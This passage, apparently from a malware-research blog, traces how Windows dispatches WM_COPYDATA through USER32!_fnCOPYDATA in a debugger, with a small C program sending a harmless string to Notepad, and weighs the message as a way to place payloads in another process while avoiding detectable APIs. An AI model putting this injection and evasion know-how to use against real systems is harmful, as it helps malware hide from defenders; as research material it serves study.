0000009832e490b0  00007df55e7f0650
0000009832e490b8  0000000000000001
0000009832e490c0  ffffe86d079b8000
0000009832e490c8  0000000000100000
0000009832e490d0  0000000000002000

Closer inspection of USER32!apfnDispatch reveals an array of functions.

0:001> dps USER32!apfnDispatch

00007ffd6afc3070  00007ffd6af62bd0 USER32!_fnCOPYDATA
00007ffd6afc3078  00007ffd6afbae70 USER32!_fnCOPYGLOBALDATA
00007ffd6afc3080  00007ffd6af60420 USER32!_fnDWORD
00007ffd6afc3088  00007ffd6af65680 USER32!_fnNCDESTROY
00007ffd6afc3090  00007ffd6af696a0 USER32!_fnDWORDOPTINLPMSG
00007ffd6afc3098  00007ffd6afbb4a0 USER32!_fnINOUTDRAG
00007ffd6afc30a0  00007ffd6af65d40 USER32!_fnGETTEXTLENGTHS
00007ffd6afc30a8  00007ffd6afbb220 USER32!_fnINCNTOUTSTRING
00007ffd6afc30b0  00007ffd6afbb750 USER32!_fnINCNTOUTSTRINGNULL
00007ffd6afc30b8  00007ffd6af675c0 USER32!_fnINLPCOMPAREITEMSTRUCT
00007ffd6afc30c0  00007ffd6af641f0 USER32!__fnINLPCREATESTRUCT
00007ffd6afc30c8  00007ffd6afbb2e0 USER32!_fnINLPDELETEITEMSTRUCT
00007ffd6afc30d0  00007ffd6af6bc00 USER32!__fnINLPDRAWITEMSTRUCT
00007ffd6afc30d8  00007ffd6afbb330 USER32!_fnINLPHELPINFOSTRUCT
00007ffd6afc30e0  00007ffd6afbb330 USER32!_fnINLPHELPINFOSTRUCT
00007ffd6afc30e8  00007ffd6afbb430 USER32!_fnINLPMDICREATESTRUCT

The first function, USER32!_fnCOPYDATA, is called when process A sends the WM_COPYDATA message to a window belonging to process B. The kernel will dispatch the message, including other parameters to the target window handle, that will be handled by the windows procedure associated with it.

0:001> u USER32!_fnCOPYDATA
USER32!_fnCOPYDATA:
00007ffd6af62bd0 4883ec58        sub     rsp,58h
00007ffd6af62bd4 33c0            xor     eax,eax
00007ffd6af62bd6 4c8bd1          mov     r10,rcx
00007ffd6af62bd9 89442438        mov     dword ptr [rsp+38h],eax
00007ffd6af62bdd 4889442440      mov     qword ptr [rsp+40h],rax
00007ffd6af62be2 394108          cmp     dword ptr [rcx+8],eax
00007ffd6af62be5 740b            je      USER32!_fnCOPYDATA+0x22 (00007ffd6af62bf2)
00007ffd6af62be7 48394120        cmp     qword ptr [rcx+20h],rax

Set a breakpoint on this function and continue execution.

0:001> bp USER32!_fnCOPYDATA
0:001> g

The following piece of code will send the WM_COPYDATA message to notepad. Compile and run it.

int main(void){
  COPYDATASTRUCT cds;
  HWND           hw;
  WCHAR          msg[]=L"I don't know what to say!\n";
  
  hw = FindWindowEx(0,0,L"Notepad",0);
  
  if(hw!=NULL){   
    cds.dwData = 1;
    cds.cbData = lstrlen(msg)*2;
    cds.lpData = msg;
    
    // copy data to notepad memory space
    SendMessage(hw, WM_COPYDATA, (WPARAM)hw, (LPARAM)&cds);
  }
  return 0;
}

Once this code executes, it will attempt to find the window handle of Notepad before sending it the WM_COPYDATA message, and this will trigger our breakpoint in the debugger. The call stack shows where the call originated from, in this case it’s from KiUserCallbackDispatcherContinue. Based on the calling convention, the arguments are placed in RCX, RDX, R8 and R9.

Breakpoint 0 hit
USER32!_fnCOPYDATA:
00007ffd6af62bd0 4883ec58        sub     rsp,58h
0:000> k
 # Child-SP          RetAddr           Call Site
00 0000009832caf618 00007ffd6c03dbc4 USER32!_fnCOPYDATA
01 0000009832caf620 00007ffd688d1144 ntdll!KiUserCallbackDispatcherContinue
02 0000009832caf728 00007ffd6af61b0b win32u!NtUserGetMessage+0x14
03 0000009832caf730 00007ff79cc13bed USER32!GetMessageW+0x2b
04 0000009832caf790 00007ff79cc29333 notepad!WinMain+0x291
05 0000009832caf890 00007ffd6bb23034 notepad!__mainCRTStartup+0x19f
06 0000009832caf950 00007ffd6c011431 KERNEL32!BaseThreadInitThunk+0x14
07 0000009832caf980 0000000000000000 ntdll!RtlUserThreadStart+0x21

0:000> r
rax=00007ffd6af62bd0 rbx=0000000000000000 rcx=0000009832caf678
rdx=00000000000000b0 rsi=0000000000000000 rdi=0000000000000000
rip=00007ffd6af62bd0 rsp=0000009832caf618 rbp=0000009832caf829
 r8=0000000000000000  r9=00007ffd6afc3070 r10=0000000000000000
r11=0000000000000244 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
USER32!_fnCOPYDATA:
00007ffd6af62bd0 4883ec58        sub     rsp,58h

Dumping the contents of first parameter in the RCX register shows some recognizable data sent by the example program. notepad!NPWndProc is obviously the callback procedure associated with the target window receiving WM_COPYDATA.

0:000> dps rcx
0000009832caf678  00000038000000b0
0000009832caf680  0000000000000001
0000009832caf688  0000000000000000
0000009832caf690  0000000000000070
0000009832caf698  0000000000000000
0000009832caf6a0  0000029258bbc070
0000009832caf6a8  000000000000004a       // WM_COPYDATA
0000009832caf6b0  00000000000c072e
0000009832caf6b8  0000000000000001
0000009832caf6c0  0000000000000001
0000009832caf6c8  0000000000000034
0000009832caf6d0  0000000000000078
0000009832caf6d8  00007ff79cc131b0 notepad!NPWndProc
0000009832caf6e0  00007ffd6c039da0 ntdll!NtdllDispatchMessage_W
0000009832caf6e8  0000000000000058
0000009832caf6f0  006f006400200049

The structure passed to fnCOPYDATA isn’t part of the debugging symbols, but here’s what we’re looking at.

typedef struct _CAPTUREBUF {
    DWORD cbCallback;
    DWORD cbCapture;
    DWORD cCapturedPointers;
    PBYTE pbFree;              
    DWORD offPointers;
    PVOID pvVirtualAddress;
} CAPTUREBUF, *PCAPTUREBUF;

typedef struct _FNCOPYDATAMSG {
    CAPTUREBUF     CaptureBuf;
    PWND           pwnd;
    UINT           msg;
    HWND           hwndFrom;
    BOOL           fDataPresent;
    COPYDATASTRUCT cds;
    ULONG_PTR      xParam;
    PROC           xpfnProc;
} FNCOPYDATAMSG;

Continue to single-step (t) through the code and examine the contents of the registers.

0:000> r
r
rax=00007ffd6c039da0 rbx=0000000000000000 rcx=00007ff79cc131b0
rdx=000000000000004a rsi=0000000000000000 rdi=0000000000000000
rip=00007ffd6af62c16 rsp=0000009832caf5c0 rbp=0000009832caf829
 r8=00000000000c072e  r9=0000009832caf6c0 r10=0000009832caf678
r11=0000000000000244 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
USER32!_fnCOPYDATA+0x46:
00007ffd6af62c16 498b4a28        mov     rcx,qword ptr [r10+28h] ds:0000009832caf6a0=0000029258bbc070

0:000> u rcx
notepad!NPWndProc:
00007ff79cc131b0 4055            push    rbp
00007ff79cc131b2 53              push    rbx
00007ff79cc131b3 56              push    rsi
00007ff79cc131b4 57              push    rdi
00007ff79cc131b5 4154            push    r12
00007ff79cc131b7 4155            push    r13
00007ff79cc131b9 4156            push    r14
00007ff79cc131bb 4157            push    r15

We see a pointer to COPYDATASTRUCT is placed in r9.

0:000> dps r9
0000009832caf6c0  0000000000000001
0000009832caf6c8  0000000000000034
0000009832caf6d0  0000009832caf6f0
0000009832caf6d8  00007ff79cc131b0 notepad!NPWndProc
0000009832caf6e0  00007ffd6c039da0 ntdll!NtdllDispatchMessage_W
0000009832caf6e8  0000000000000058
0000009832caf6f0  006f006400200049
0000009832caf6f8  002000740027006e
0000009832caf700  0077006f006e006b
0000009832caf708  0061006800770020
0000009832caf710  006f007400200074
0000009832caf718  0079006100730020
0000009832caf720  00000000000a0021
0000009832caf728  00007ffd6af61b0b USER32!GetMessageW+0x2b
0000009832caf730  0000009800000000
0000009832caf738  0000000000000001

This structure is defined in the debugging symbols, so we can dump it showing the values it contains.

0:000> dt uxtheme!COPYDATASTRUCT 0000009832caf6c0
   +0x000 dwData           : 1
   +0x008 cbData           : 0x34
   +0x010 lpData           : 0x0000009832caf6f0 Void

Finally, examine the lpData field that should contain the string we sent from process A.

0:000> du poi(0000009832caf6c0+10)
0000009832caf6f0  "I don't know what to say!."

We can see this address belongs to the stack allocated when thread was created.

0:000> !address 0000009832caf6f0

Usage:                  Stack
Base Address:           0000009832c9f000
End Address:            0000009832cb0000
Region Size:            0000000000011000 (  68.000 kB)
State:                  00001000          MEM_COMMIT
Protect:                00000004          PAGE_READWRITE
Type:                   00020000          MEM_PRIVATE
Allocation Base:        0000009832c30000
Allocation Protect:     00000004          PAGE_READWRITE
More info:              ~0k

Examining the Thread Information Block (TIB) that is located in the Thread Environment Block (TEB) provides us with the StackBase and StackLimit.

0:001> dx -r1 (*((uxtheme!_NT_TIB *)0x9832e4a000))
(*((uxtheme!_NT_TIB *)0x9832e4a000))                 [Type: _NT_TIB]
    [+0x000] ExceptionList    : 0x0 [Type: _EXCEPTION_REGISTRATION_RECORD *]
    [+0x008] StackBase        : 0x9832cb0000 [Type: void *]
    [+0x010] StackLimit       : 0x9832c9f000 [Type: void *]
    [+0x018] SubSystemTib     : 0x0 [Type: void *]
    [+0x020] FiberData        : 0x1e00 [Type: void *]
    [+0x020] Version          : 0x1e00 [Type: unsigned long]
    [+0x028] ArbitraryUserPointer : 0x0 [Type: void *]
    [+0x030] Self             : 0x9832e4a000 [Type: _NT_TIB *]

OK, we can use WM_COPYDATA to deploy a payload into a target process IF it has a GUI attached to it, but it’s not useful unless we can execute it. Moreover, the stack is a volatile area of memory and therefore unreliable to use as a code cave. To execute it would require locating the exact address and using a ROP chain. By the time the ROP chain is executed, there’s no guarantee the payload will still be intact. So, we probably can’t use WM_COPYDATA on this occasion, but it’s worth remembering there are likely many ways of sharing a payload with another process using legitimate API that are less suspicious than using WriteProcessMemory or NtWriteVirtualMemory.

In the case of WM_COPYDATA, one would still need to determine the exact address in stack of payload. Contents of the Thread Environment Block (TEB) can be retrieved via the NtQueryThreadInformation API using the ThreadBasicInformation class. After reading the TebAddress, the StackLimit and StackBase values can be read. In any case, the volatility of the stack means the payload would likely be overwritten before being executed.

Summary

Avoiding the conventional API used to deploy and execute a payload all increase the difficulty of detection. PowerLoader used a code cave in existing section object and a ROP chain for execution. PowerLoaderEx, which is a PoC used the desktop heap, while the AtomBombing PoC uses a code cave in .data section of a DLL.

Posted in assembly, injection, malware, programming, windows | Tagged , , , , | Leave a comment